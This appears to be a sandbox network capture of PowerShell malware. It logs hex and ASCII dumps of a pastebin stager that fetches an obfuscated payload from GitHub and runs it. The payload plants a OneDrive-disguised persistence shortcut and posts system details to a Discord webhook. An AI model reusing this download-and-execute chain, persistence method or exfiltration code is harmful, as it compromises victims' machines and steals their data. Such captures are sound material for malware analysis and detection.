                                                                        X-Timer: S1729008562.987518,VS0,VE3
                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        X-Fastly-Request-ID: 55f4cbe87dde2c704f9f16ca256925e361f20099
                                                                        Expires: Tue, 15 Oct 2024 16:14:21 GMT
                                                                        Source-Age: 261
                                                                        2024-10-15 16:09:22 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                        Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                        2024-10-15 16:09:22 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                        Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                        2024-10-15 16:09:22 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                        Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                        2024-10-15 16:09:22 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                        Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                        2024-10-15 16:09:22 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                        Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                        2024-10-15 16:09:22 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                        Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.449742172.67.19.244435368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 16:09:26 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: pastebin.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 16:09:26 UTC397INHTTP/1.1 200 OK
                                                                        Date: Tue, 15 Oct 2024 16:09:26 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        x-frame-options: DENY
                                                                        x-content-type-options: nosniff
                                                                        x-xss-protection: 1;mode=block
                                                                        cache-control: public, max-age=1801
                                                                        CF-Cache-Status: HIT
                                                                        Age: 685
                                                                        Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d3112d669e46b4c-DFW
                                                                        2024-10-15 16:09:26 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                        Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                        2024-10-15 16:09:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.449744185.199.111.1334435368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 16:09:28 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 16:09:28 UTC900INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 7508
                                                                        Cache-Control: max-age=300
                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: deny
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 16:09:28 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdal2120044-DFW
                                                                        X-Cache: HIT
                                                                        X-Cache-Hits: 1
                                                                        X-Timer: S1729008568.420838,VS0,VE1
                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        X-Fastly-Request-ID: 399922f76bf9cce0bd0204031cf4928569d37d76
                                                                        Expires: Tue, 15 Oct 2024 16:14:28 GMT
                                                                        Source-Age: 268
                                                                        2024-10-15 16:09:28 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                        Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                        2024-10-15 16:09:28 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                        Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                        2024-10-15 16:09:28 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                        Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                        2024-10-15 16:09:28 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                        Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                        2024-10-15 16:09:28 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                        Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                        2024-10-15 16:09:28 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                        Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.449761162.159.137.232443280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 16:09:35 UTC311OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Content-Type: application/json
                                                                        Host: discord.com
                                                                        Content-Length: 297
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 16:09:35 UTC297OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 6a 6f 6e 65 73 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4b 54 59 4e 39 54 35 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46
                                                                        Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** KTYN9T5\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - F
                                                                        2024-10-15 16:09:35 UTC1255INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 15 Oct 2024 16:09:35 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 45
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                        x-ratelimit-limit: 5
                                                                        x-ratelimit-remaining: 4
                                                                        x-ratelimit-reset: 1729008576
                                                                        x-ratelimit-reset-after: 1
                                                                        via: 1.1 google
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36kcIfgf4Ww7B5a4qmxA8errYHltms%2BDzrWAFvuNXxxnN0gMa7GpuiW5Nx6qU3QwWy2SX5bel8uEykUdl%2F30cN6lwff4QaVcSzNUpPDH4Dy2qV0xxCPLI%2FIJ5yND"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        X-Content-Type-Options: nosniff
                                                                        Set-Cookie: __cfruid=593086c6c7501533514da0d261e42bf2bed5f56f-1729008575; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                        Set-Cookie: _cfuvid=AAC46UkwxbGeIv6p3oOUBX6MdznZEgqj2V6FvTzVxdw-1729008575368-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d31130adaec4868-DFW
                                                                        2024-10-15 16:09:35 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                        Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.449797162.159.137.2324435368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 16:09:41 UTC311OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Content-Type: application/json
                                                                        Host: discord.com
                                                                        Content-Length: 297
                                                                        Connection: Keep-Alive
